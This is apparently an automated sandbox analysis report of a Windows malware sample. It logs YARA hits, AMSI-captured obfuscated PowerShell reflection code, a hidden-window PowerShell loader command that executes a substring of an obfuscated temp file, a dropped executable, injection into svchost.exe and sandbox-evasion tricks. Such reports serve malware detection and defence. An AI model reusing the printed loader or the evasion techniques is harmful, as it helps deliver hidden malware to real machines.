            Source: Binary string: wntdll.pdbUGP source: Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Opfattelsers.exe, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: svchost.pdb source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000006.00000002.3027521068.0000000002BA4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2803507760.000000000A274000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Sikkerheder $Latterliggrelsen $Jerseykvg), (Udskilt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Peddle = [AppDomain]::CurrentDomain.GetAssemblies()$glo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Verdenskrig)), $hibernated).DefineDynamicModule($huntsman, $false).DefineType($Scleronychia, $Subscale, [System.MulticastDelegate])$Sy
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss)Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06FE0FC4 push es; iretd 2_2_06FE0FC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D35C98 push ds; retf 2_2_08D35C99
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D33EB3 push ebp; retf 2_2_08D33EBC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D34078 push 00000046h; retf 2_2_08D3407A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D30631 push cs; iretd 2_2_08D30682
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D33822 push 0000007Eh; ret 2_2_08D3386F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D337C0 push 0000007Eh; ret 2_2_08D3386F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D351F0 push FFFFFFCDh; iretd 2_2_08D35205
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D3239C push esi; ret 2_2_08D323A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D35DBB push FFFFFFAAh; ret 2_2_08D35DC6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D30FBC push esp; iretd 2_2_08D30FC9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D35F7A push ebp; iretd 2_2_08D35F85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D31510 push ss; retf 2_2_08D31515
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D33D21 push esp; retf 2_2_08D33D24
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D31329 push ebp; ret 2_2_08D31330
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D32B2C push edx; ret 2_2_08D32B32
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A09AD push ecx; mov dword ptr [esp], ecx6_2_1F7A09B6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_016651F0 push FFFFFFCDh; iretd 6_2_01665205
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01664078 push 00000046h; retf 6_2_0166407A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01661329 push ebp; ret 6_2_01661330
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_0166239C push esi; ret 6_2_016623A1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01661510 push ss; retf 6_2_01661515
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_016637C0 push 0000007Eh; ret 6_2_0166386F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01660631 push cs; iretd 6_2_01660682
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01663822 push 0000007Eh; ret 6_2_0166386F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01662B2C push edx; ret 6_2_01662B32
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01663D21 push esp; retf 6_2_01663D24
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01665DBB push FFFFFFAAh; ret 6_2_01665DC6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01665C98 push ds; retf 6_2_01665C99
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01665F7A push ebp; iretd 6_2_01665F85
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_01660FBC push esp; iretd 6_2_01660FC9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeAPI/Special instruction interceptor: Address: 3110DFB
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DFE20 rdtsc 6_2_1F7DFE20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6179Jump to behavior
